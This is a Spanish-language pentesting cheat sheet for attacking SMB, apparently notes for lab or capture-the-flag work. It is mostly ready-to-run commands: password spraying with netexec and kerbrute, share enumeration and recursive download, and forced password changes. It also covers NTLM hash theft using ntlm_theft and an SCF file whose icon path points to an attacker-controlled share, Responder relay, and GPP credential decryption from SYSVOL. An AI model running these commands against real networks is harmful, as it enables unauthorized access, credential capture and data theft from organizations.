445 - SMB

nxc smb IP
netexec smb IP -u 'USER' -p 'PASS' -d DOMAIN --shares

Password spraying (hacerlo cuando no se encuentra nada)

Probarlo con:

netexec smb IP -u users.txt -p users.txt -d DOMAIN --continue-on-success --no-bruteforce
netexec smb IP -u users.txt -p "password" -d DOMAIN --continue-on-success --no-bruteforce

Para encontrar accounts that must change password at next logon :

netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success

Cambiar pass

env NEWPASS='P@ssw0rd!2025#' ; \ netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"

Kerberos Password Spraying:

awk '{print $0":"$0}' validUsers.txt  > combs.txt
sudo ntpdate -u 10.10.11.75

./kerbrute_linux_amd64 bruteforce -d DOMAIN --dc combs.txt -t 1

msfconsole
use auxiliary/scanner/smb/smb_enumshares
set RHOSTS IP_DEL_SERVIDOR
run
smbmap -H IP -u 'null'
smbmap -H IP -u ''
smbclient -L 
smbclient -L IP -N
smbmap -H IP -u USER -p 'PASS'

A veces se buguean los permisos, mejor hacerlo con :

netexec smb IP -u USER  -p PASS  -d DOMAIN --shares

smbclient //IP/NOMBRE_RECURSO -U USER%PASS
smbclient -L IP -N --option='client min protocol=SMB2'

Descargar de forma recursiva:

recurse
prompt
mget *

Configuración de samba

/etc/samba/smb.conf

SMB

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares
HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares

Como robar hashes si tengo permisos de escritura:

git clone https://github.com/Greenwolf/ntlm_theft.git
python3 ntlm_theft.py -g all -s IP-ATACANTE -f test
smbclient //IP/RESOURCE -U USER 'PASS'
prompt
mput *
sudo responder -I tun0

SCF file attack

[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

SMB relay

sudo responder -I tun0 -wdv

Con kerberos

nxc smb DC.domain -u 'USER' -p 'PASS' -k --shares
python3 /usr/share/doc/python3-impacket/examples/smbclient.py -k DOMAIN/USER@DC.DOMAIN -no-pass

CVE-2025-24071

💀 Exploit for CVE-2025-24071

🛠️ ¿Quiénes son vulnerables?

Según fuentes como NVD y CVEdetails, están afectados los siguientes sistemas si no están actualizados:

Windows Server:

Windows 10:

Windows 11:

Para ver la versión :

cmd /c ver
Get-ComputerInfo | Select-Object OsName, OsVersion, OsBuildNumber
netexec smb IP -d DOMAIN

SYSVOL > Policies

El directorio Policies\ en SMB suele encontrarse en entornos Windows, especialmente en servidores que gestionan Active Directory (AD) y políticas de grupo (Group Policy Objects - GPOs). Este directorio normalmente se encuentra en la SYSVOL compartida de un Controlador de Dominio (DC) y contiene configuraciones importantes para los clientes del dominio.


📂 Contenido típico de Policies\ en SMB

Si accedes a un servidor SMB y ves una carpeta Policies\, es probable que contenga:

  1. Identificadores de GPOs (GUIDs)

    • Cada política de grupo se almacena en una carpeta con un GUID (por ejemplo, {31B2F340-016D-11D2-945F-00C04FB984F9}).
    • Estas carpetas contienen la configuración de la política aplicada a usuarios y computadoras en el dominio.
  2. Archivos GPT.INI

    • Un archivo GPT.INI dentro de cada política define la versión de la política de grupo.
    • Ejemplo de contenido:
        [General]
        Version=2
    
        
3. **Carpeta `Machine\`**
    
    - Contiene configuraciones aplicadas a **todas las máquinas** dentro del dominio.
    - Puede incluir:
        - **`Registry.pol`** (configuración del registro para equipos del dominio)
        - **`Scripts\`** (scripts de inicio o cierre de sesión)
        - **`Adm\`** (plantillas administrativas antiguas)
4. **Carpeta `User\`**
    
    - Contiene configuraciones aplicadas a **usuarios** del dominio.
    - Similar a `Machine\`, puede incluir:
        - **`Registry.pol`** (modificaciones del registro para usuarios)
        - **Scripts de inicio/cierre de sesión**.
5. **Carpeta `Preferences\`**
    
    - Almacena configuraciones de **Group Policy Preferences (GPP)**.
    - Puede contener archivos XML con **credenciales cifradas**, lo que es un objetivo interesante en pruebas de seguridad.
6. **Archivos de scripts (`.bat`, `.cmd`, `.vbs`, `.ps1`)**
    
    - Se usan para automatizar configuraciones en máquinas y usuarios cuando inician sesión.

---

### **📌 Importancia de `Policies\` en pruebas de seguridad**

- Puede contener **contraseñas cifradas en XML** dentro de `Preferences\` (se pueden descifrar con herramientas como `gpp-decrypt`).
- Puede permitir la manipulación de políticas si el atacante tiene permisos de escritura (`SeBackupPrivilege` o `SeRestorePrivilege`).
- La presencia de scripts puede ser útil para la **ejecución de código remoto** en equipos del dominio.